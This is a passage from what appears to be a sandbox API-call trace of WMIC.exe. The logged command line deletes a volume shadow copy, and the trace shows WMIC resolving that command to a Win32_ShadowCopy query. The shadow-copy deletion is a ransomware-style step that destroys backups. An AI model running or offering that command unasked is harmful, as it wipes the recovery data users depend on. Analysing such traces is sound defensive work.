(_Block=0x4bc7e0) [0121.606] malloc (_Size=0x18) returned 0x4bc7e0 [0121.606] malloc (_Size=0x18) returned 0x4bc800 [0121.606] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.606] SysStringLen (param_1="TABLE") returned 0x5 [0121.606] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.606] SysStringLen (param_1="XML") returned 0x3 [0121.606] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.606] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.606] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.606] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.606] malloc (_Size=0x30) returned 0x4b8340 [0121.607] malloc (_Size=0x18) returned 0x4bc820 [0121.608] free (_Block=0x4bc820) [0121.608] malloc (_Size=0x18) returned 0x4bc820 [0121.608] malloc (_Size=0x18) returned 0x4bc840 [0121.608] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.608] SysStringLen (param_1="TABLE") returned 0x5 [0121.608] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.608] SysStringLen (param_1="XML") returned 0x3 [0121.608] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.608] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.608] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.608] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.608] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.608] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.608] malloc (_Size=0x30) returned 0x4b8380 [0121.609] malloc (_Size=0x18) returned 0x4bc860 [0121.609] free (_Block=0x4bc860) [0121.609] malloc (_Size=0x18) returned 0x4bc860 [0121.609] malloc (_Size=0x18) returned 0x4bc880 [0121.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.609] SysStringLen (param_1="TABLE") returned 0x5 [0121.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.609] SysStringLen (param_1="XML") returned 0x3 [0121.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.609] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.609] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.609] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.609] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.609] malloc (_Size=0x30) returned 0x4b83c0 [0121.610] malloc (_Size=0x18) returned 0x4bc8a0 [0121.610] free (_Block=0x4bc8a0) [0121.610] malloc (_Size=0x18) returned 0x4bc8a0 [0121.610] malloc (_Size=0x18) returned 0x4bc8c0 [0121.610] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.610] SysStringLen (param_1="TABLE") returned 0x5 [0121.610] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.610] SysStringLen (param_1="XML") returned 0x3 [0121.610] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.610] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.610] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.610] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.610] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.610] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.611] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.611] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.611] malloc (_Size=0x30) returned 0x4b8400 [0121.611] malloc (_Size=0x18) returned 0x4bc8e0 [0121.611] free (_Block=0x4bc8e0) [0121.611] malloc (_Size=0x18) returned 0x4bc8e0 [0121.611] malloc (_Size=0x18) returned 0x4bc900 [0121.611] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.611] SysStringLen (param_1="TABLE") returned 0x5 [0121.611] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.611] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.611] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.611] SysStringLen (param_1="XML") returned 0x3 [0121.611] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.612] SysStringLen (param_1="texttablewsys") returned 0xd [0121.612] SysStringLen (param_1="XML") returned 0x3 [0121.612] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.612] malloc (_Size=0x30) returned 0x4b8440 [0121.612] malloc (_Size=0x18) returned 0x4bc920 [0121.612] free (_Block=0x4bc920) [0121.612] malloc (_Size=0x18) returned 0x4bc920 [0121.612] malloc (_Size=0x18) returned 0x4bc940 [0121.612] SysStringLen (param_1="htable-sortby") returned 0xd [0121.612] SysStringLen (param_1="TABLE") returned 0x5 [0121.612] SysStringLen (param_1="htable-sortby") returned 0xd [0121.612] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.612] SysStringLen (param_1="htable-sortby") returned 0xd [0121.613] SysStringLen (param_1="XML") returned 0x3 [0121.613] SysStringLen (param_1="htable-sortby") returned 0xd [0121.613] SysStringLen (param_1="texttablewsys") returned 0xd [0121.613] SysStringLen (param_1="htable-sortby") returned 0xd [0121.613] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.613] SysStringLen (param_1="XML") returned 0x3 [0121.613] SysStringLen (param_1="htable-sortby") returned 0xd [0121.613] malloc (_Size=0x30) returned 0x4b8480 [0121.613] malloc (_Size=0x18) returned 0x4bc960 [0121.613] free (_Block=0x4bc960) [0121.613] malloc (_Size=0x18) returned 0x4bc960 [0121.613] malloc (_Size=0x18) returned 0x4bc980 [0121.613] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.613] SysStringLen (param_1="TABLE") returned 0x5 [0121.613] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.614] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.614] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.614] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.614] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.614] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.614] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.614] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.614] malloc (_Size=0x30) returned 0x4b84c0 [0121.614] malloc (_Size=0x18) returned 0x4bc9a0 [0121.614] free (_Block=0x4bc9a0) [0121.614] malloc (_Size=0x18) returned 0x4bc9a0 [0121.614] malloc (_Size=0x18) returned 0x4bc9c0 [0121.614] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.614] SysStringLen (param_1="TABLE") returned 0x5 [0121.614] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.615] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.615] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.615] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.615] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.615] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.615] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.615] malloc (_Size=0x30) returned 0x4b8500 [0121.615] malloc (_Size=0x18) returned 0x4bc9e0 [0121.615] free (_Block=0x4bc9e0) [0121.615] malloc (_Size=0x18) returned 0x4bc9e0 [0121.616] malloc (_Size=0x18) returned 0x4bca00 [0121.616] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.616] SysStringLen (param_1="TABLE") returned 0x5 [0121.616] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.616] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.616] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.616] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.616] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.616] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.616] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.616] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.616] malloc (_Size=0x30) returned 0x4b8540 [0121.616] malloc (_Size=0x18) returned 0x4bca20 [0121.616] free (_Block=0x4bca20) [0121.617] malloc (_Size=0x18) returned 0x4bca20 [0121.617] malloc (_Size=0x18) returned 0x4bca40 [0121.617] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.617] SysStringLen (param_1="TABLE") returned 0x5 [0121.617] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.617] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.617] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.617] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.617] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.617] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.617] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.617] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.617] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.617] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.617] malloc (_Size=0x30) returned 0x4b8580 [0121.618] FreeThreadedDOMDocument:IUnknown:Release (This=0x20671d0) returned 0x0 [0121.618] free (_Block=0x4b6e90) [0121.618] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete" [0121.618] malloc (_Size=0xe0) returned 0x4bcd30 [0121.618] memcpy_s (in: _Destination=0x4bcd30, _DestinationSize=0xde, _Source=0x2725be, _SourceSize=0xd0 | out: _Destination=0x4bcd30) returned 0x0 [0121.618] malloc (_Size=0x18) returned 0x4bca60 [0121.618] malloc (_Size=0x18) returned 0x4bca80 [0121.618] malloc (_Size=0x18) returned 0x4bcaa0 [0121.619] malloc (_Size=0x18) returned 0x4bcac0 [0121.619] malloc (_Size=0x80) returned 0x4b6e90 [0121.619] GetLocalTime (in: lpSystemTime=0x12f7f0 | out: lpSystemTime=0x12f7f0*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x19, wMilliseconds=0x3a1)) [0121.619] _vsnwprintf (in: _Buffer=0x4b6e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x12f748 | out: _Buffer="09-04-2020T08:55:25") returned 19 [0121.619] lstrlenW (lpString=" shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete") returned 71 [0121.619] malloc (_Size=0x90) returned 0x4b70a0 [0121.619] lstrlenW (lpString=" shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete") returned 71 [0121.619] lstrlenW (lpString=" shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete") returned 71 [0121.619] malloc (_Size=0x90) returned 0x4bce20 [0121.619] lstrlenW (lpString=" shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete") returned 71 [0121.619] lstrlenW (lpString=" shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete") returned 71 [0121.619] lstrlenW (lpString=" shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete") returned 71 [0121.619] malloc (_Size=0x16) returned 0x4bcae0 [0121.619] lstrlenW (lpString="shadowcopy") returned 10 [0121.619] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0121.619] malloc (_Size=0x16) returned 0x4bcb00 [0121.619] malloc (_Size=0x8) returned 0x4b7140 [0121.619] free (_Block=0x0) [0121.620] free (_Block=0x4bcae0) [0121.620] lstrlenW (lpString=" shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete") returned 71 [0121.620] malloc (_Size=0xc) returned 0x4bcae0 [0121.620] lstrlenW (lpString="where") returned 5 [0121.620] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0121.620] malloc (_Size=0xc) returned 0x4bcb20 [0121.620] malloc (_Size=0x10) returned 0x4bcb40 [0121.620] memmove_s (in: _Destination=0x4bcb40, _DestinationSize=0x8, _Source=0x4b7140, _SourceSize=0x8 | out: _Destination=0x4bcb40) returned 0x0 [0121.620] free (_Block=0x4b7140) [0121.620] free (_Block=0x0) [0121.620] free (_Block=0x4bcae0) [0121.620] lstrlenW (lpString=" shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete") returned 71 [0121.620] malloc (_Size=0x5c) returned 0x4bcec0 [0121.620] lstrlenW (lpString="\"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\"") returned 45 [0121.620] _wcsicmp (_String1="\"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\"", _String2="\"NULL\"") returned -5 [0121.620] lstrlenW (lpString="\"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\"") returned 45 [0121.620] lstrlenW (lpString="\"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\"") returned 45 [0121.620] malloc (_Size=0x5c) returned 0x4bcf30 [0121.620] malloc (_Size=0x18) returned 0x4bcae0 [0121.620] memmove_s (in: _Destination=0x4bcae0, _DestinationSize=0x10, _Source=0x4bcb40, _SourceSize=0x10 | out: _Destination=0x4bcae0) returned 0x0 [0121.621] free (_Block=0x4bcb40) [0121.621] free (_Block=0x0) [0121.621] free (_Block=0x4bcec0) [0121.621] lstrlenW (lpString=" shadowcopy where \"ID='{C7241040-5C13-409D-A239-55D005C03DE9}'\" delete") returned 71 [0121.621] malloc (_Size=0xe) returned 0x4bcb40 [0121.621] lstrlenW (lpString="delete") returned 6 [0121.621] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0121.621] malloc (_Size=0xe) returned 0x4bcb60 [0121.621] malloc (_Size=0x20) returned 0x4bcec0 [0121.621] memmove_s (in: _Destination=0x4bcec0, _DestinationSize=0x18, _Source=0x4bcae0, _SourceSize=0x18 | out: _Destination=0x4bcec0) returned 0x0 [0121.621] free (_Block=0x4bcae0) [0121.621] free (_Block=0x0) [0121.621] free (_Block=0x4bcb40) [0121.621] malloc (_Size=0x20) returned 0x4bcef0 [0121.621] lstrlenW (lpString="QUIT") returned 4 [0121.621] lstrlenW (lpString="shadowcopy") returned 10 [0121.621] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0121.621] lstrlenW (lpString="EXIT") returned 4 [0121.621] lstrlenW (lpString="shadowcopy") returned 10 [0121.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0121.622] free (_Block=0x4bcef0) [0121.622] WbemLocator:IUnknown:AddRef (This=0x1f1390) returned 0x2 [0121.622] malloc (_Size=0x20) returned 0x4bcef0 [0121.622] lstrlenW (lpString="/") returned 1 [0121.622] lstrlenW (lpString="shadowcopy") returned 10 [0121.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0121.622] lstrlenW (lpString="-") returned 1 [0121.622] lstrlenW (lpString="shadowcopy") returned 10 [0121.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0121.622] lstrlenW (lpString="CLASS") returned 5 [0121.622] lstrlenW (lpString="shadowcopy") returned 10 [0121.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0121.622] lstrlenW (lpString="PATH") returned 4 [0121.622] lstrlenW (lpString="shadowcopy") returned 10 [0121.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0121.622] lstrlenW (lpString="CONTEXT") returned 7 [0121.622] lstrlenW (lpString="shadowcopy") returned 10 [0121.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0121.622] lstrlenW (lpString="shadowcopy") returned 10 [0121.622] malloc (_Size=0x16) returned 0x4bcb40 [0121.623] lstrlenW (lpString="shadowcopy") returned 10 [0121.623] GetCurrentThreadId () returned 0x7ec [0121.623] ??0CHString@@QEAA@XZ () returned 0x12f600 [0121.623] malloc (_Size=0x18) returned 0x4bcae0 [0121.623] malloc (_Size=0x18) returned 0x4bcb80 [0121.623] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffcf2998 | out: ppNamespace=0xffcf2998*=0x203a98) returned 0x0 [0121.643] free (_Block=0x4bcb80) [0121.643] free (_Block=0x4bcae0) [0121.643] CoSetProxyBlanket (pProxy=0x203a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0121.643] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.643] GetCurrentThreadId () returned 0x7ec [0121.643] ??0CHString@@QEAA@XZ () returned 0x12f498 [0121.643] malloc (_Size=0x18) returned 0x4bcae0 [0121.643] malloc (_Size=0x18) returned 0x4bcb80 [0121.644] malloc (_Size=0x18) returned 0x4bcba0 [0121.644] malloc (_Size=0x18) returned 0x4bcbc0 [0121.644] SysStringLen (param_1="root\\cli") returned 0x8 [0121.644] SysStringLen (param_1="\\") returned 0x1 [0121.644] malloc (_Size=0x18) returned 0x4bcbe0 [0121.644] SysStringLen (param_1="root\\cli\\") returned 0x9 [0121.644] SysStringLen (param_1="ms_409") returned 0x6 [0121.644] free (_Block=0x4bcbc0) [0121.644] free (_Block=0x4bcba0) [0121.644] free (_Block=0x4bcb80) [0121.644] free (_Block=0x4bcae0) [0121.644] malloc (_Size=0x18) returned 0x4bcae0 [0121.644] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffcf29a0 | out: ppNamespace=0xffcf29a0*=0x203b28) returned 0x0 [0121.648] free (_Block=0x4bcae0) [0121.648] free (_Block=0x4bcbe0) [0121.648] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.648] GetCurrentThreadId () returned 0x7ec [0121.649] ??0CHString@@QEAA@XZ () returned 0x12f610 [0121.649] malloc (_Size=0x18) returned 0x4bcbe0 [0121.649] malloc (_Size=0x18) returned 0x4bcae0 [0121.649] malloc (_Size=0x18) returned 0x4bcb80 [0121.649] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0121.649] malloc (_Size=0x3a) returned 0x4bcfa0 [0121.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc81980, cbMultiByte=-1, lpWideCharStr=0x4bcfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0121.649] free (_Block=0x4bcfa0) [0121.649] malloc (_Size=0x18) returned 0x4bcba0 [0121.649] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0121.649] SysStringLen (param_1="shadowcopy") returned 0xa [0121.649] malloc (_Size=0x18) returned 0x4bcbc0 [0121.649] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0121.649] SysStringLen (param_1="'") returned 0x1 [0121.649] free (_Block=0x4bcba0) [0121.649] free (_Block=0x4bcb80) [0121.649] free (_Block=0x4bcae0) [0121.650] free (_Block=0x4bcbe0) [0121.650] IWbemServices:GetObject (in: This=0x203a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x12f618*=0x0, ppCallResult=0x0 | out: ppObject=0x12f618*=0x2104e0, ppCallResult=0x0) returned 0x0 [0121.656] malloc (_Size=0x18) returned 0x4bcbe0 [0121.656] IWbemClassObject:Get (in: This=0x2104e0, wszName="Target", lFlags=0, pVal=0x12f540*(varType=0x0, wReserved1=0xffcf, wReserved2=0x0, wReserved3=0x0, varVal1=0xffcf2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f540*(varType=0x8, wReserved1=0xffcf, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.656] free (_Block=0x4bcbe0) [0121.656] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0121.656] malloc (_Size=0x3e) returned 0x4bcfa0 [0121.656] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0121.656] malloc (_Size=0x18) returned 0x4bcbe0 [0121.656] IWbemClassObject:Get (in: This=0x2104e0, wszName="PWhere", lFlags=0, pVal=0x12f540*(varType=0x0, wReserved1=0xffcf, wReserved2=0x0, wReserved3=0x0, varVal1=0x29e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f540*(varType=0x8, wReserved1=0xffcf, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.657] free (_Block=0x4bcbe0) [0121.657] lstrlenW (lpString=" Where ID = '#'") returned 15 [0121.657] malloc (_Size=0x20) returned 0x4bcff0 [0121.657] lstrlenW (lpString=" Where ID = '#'") returned 15 [0121.657] malloc (_Size=0x18) returned 0x4bcbe0 [0121.657] IWbemClassObject:Get (in: This=0x2104e0, wszName="Connection", lFlags=0, pVal=0x12f540*(varType=0x0, wReserved1=0xffcf, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ebd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f540*(varType=0xd, wReserved1=0xffcf, wReserved2=0x0, wReserved3=0x0, varVal1=0x2109c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.657] free (_Block=0x4bcbe0) [0121.657] IUnknown:QueryInterface (in: This=0x2109c0, riid=0xffc87360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x12f530 | out: ppvObject=0x12f530*=0x2109c0) returned 0x0 [0121.657] GetCurrentThreadId () returned 0x7ec [0121.657] ??0CHString@@QEAA@XZ () returned 0x12f458 [0121.657] malloc (_Size=0x18) returned 0x4bcbe0 [0121.657] IWbemClassObject:Get (in: This=0x2109c0, wszName="Namespace", lFlags=0, pVal=0x12f480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffc9738f, varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f480*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.657] free (_Block=0x4bcbe0) [0121.658] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0121.658] malloc (_Size=0x16) returned 0x4bcbe0 [0121.658] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0121.658] malloc (_Size=0x18) returned 0x4bcae0 [0121.658] IWbemClassObject:Get (in: This=0x2109c0, wszName="Locale", lFlags=0, pVal=0x12f480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31a648, varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f480*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.658] free (_Block=0x4bcae0) [0121.658] lstrlenW (lpString="ms_409") returned 6 [0121.658] malloc (_Size=0xe) returned 0x4bcae0 [0121.658] lstrlenW (lpString="ms_409") returned 6 [0121.658] malloc (_Size=0x18) returned 0x4bcb80 [0121.658] IWbemClassObject:Get (in: This=0x2109c0, wszName="User", lFlags=0, pVal=0x12f480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31a648, varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f480*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31a648, varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.658] free (_Block=0x4bcb80) [0121.658] malloc (_Size=0x18) returned 0x4bcb80 [0121.658] IWbemClassObject:Get (in: This=0x2109c0, wszName="Password", lFlags=0, pVal=0x12f480*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31a648, varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f480*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31a648, varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.658] free (_Block=0x4bcb80) [0121.658] malloc (_Size=0x18) returned 0x4bcb80 [0121.659] IWbemClassObject:Get (in: This=0x2109c0, wszName="Server", lFlags=0, pVal=0x12f480*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31a648, varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f480*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.659] free (_Block=0x4bcb80) [0121.659] lstrlenW (lpString=".") returned 1 [0121.659] malloc (_Size=0x4) returned 0x4b7140 [0121.659] lstrlenW (lpString=".") returned 1 [0121.659] malloc (_Size=0x18) returned 0x4bcb80 [0121.659] IWbemClassObject:Get (in: This=0x2109c0, wszName="Authority", lFlags=0, pVal=0x12f480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31a648, varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f480*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31a648, varVal2=0x4bcbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.659] free (_Block=0x4bcb80) [0121.659] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.659] IUnknown:Release (This=0x2109c0) returned 0x1 [0121.659] GetCurrentThreadId () returned 0x7ec [0121.659] ??0CHString@@QEAA@XZ () returned 0x12f458 [0121.659] malloc (_Size=0x18) returned 0x4bcb80 [0121.659] IWbemClassObject:Get (in: This=0x2104e0, wszName="__RELPATH", lFlags=0, pVal=0x12f480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f480*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0121.659] free (_Block=0x4bcb80) [0121.659] malloc (_Size=0x18) returned 0x4bcb80 [0121.660] GetCurrentThreadId () returned 0x7ec [0121.660] ??0CHString@@QEAA@XZ () returned 0x12f2d8 [0121.660] ??0CHString@@QEAA@PEBG@Z () returned 0x12f2f0 [0121.660] ??0CHString@@QEAA@AEBV0@@Z () returned 0x12f280 [0121.660] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0121.660] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x4bd020 [0121.660] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0121.660] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x12f240 [0121.660] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x12f288 [0121.660] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x12f2f0 [0121.660] ??1CHString@@QEAA@XZ () returned 0x24b8a301 [0121.660] ??1CHString@@QEAA@XZ () returned 0x24b8a301 [0121.660] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x12f248 [0121.660] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x12f280 [0121.660] ??1CHString@@QEAA@XZ () returned 0x1 [0121.660] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x4bd090 [0121.660] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0121.660] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x12f240 [0121.660] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x12f288 [0121.660] 